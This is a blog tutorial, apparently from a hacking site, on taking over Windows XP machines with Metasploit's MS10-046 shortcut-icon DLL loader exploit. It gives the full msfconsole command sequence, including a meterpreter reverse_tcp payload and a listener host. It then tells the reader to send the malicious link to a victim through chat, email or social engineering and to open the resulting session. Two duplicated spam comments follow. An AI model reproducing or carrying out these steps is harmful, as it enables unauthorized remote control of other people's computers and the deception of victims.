Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Attacker: Backtrack 5 

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Hack Windows XP using Shell Link Code Execution

Now type use exploit/windows/browser/ms10_046_shortcut­_icon_dllloader

Msf exploit (ms10_046_shortcut­_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut­_icon_dllloader)>set lhost 192.168.1.6 (IP of Local Host)

Msf exploit (ms10_046_shortcut­_icon_dllloader)>set srvhost 192.168.1.6 (This must be an address on the local machine)

Msf exploit (ms10_046_shortcut­_icon_dllloader)>set uripath / (The Url to use for this exploit)

Msf exploit (ms10_046_shortcut­_icon_dllloader)>exploit

Hack Windows XP using Shell Link Code Execution

Now an URL you should give to your victim http://192.168.1.6/

Hack Windows XP using Shell Link Code Execution

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack Windows XP using Shell Link Code Execution

Related Posts Plugin for WordPress, Blogger...

6 Comments Hack Windows XP using Shell Link Code Execution

  1. Adalberto

    Generally I do not learn post on blogs, but I would like to say that
    this write-up very forced me to try and do it! Your writing taste has been surprised me.
    Thank you, very great article.

    Reply
  2. Adalberto

    Generally I do not learn post on blogs, but I would like to say that
    this write-up very forced me to try and do it! Your writing taste has been surprised me.
    Thank you, very great article.

    Reply

Leave a Reply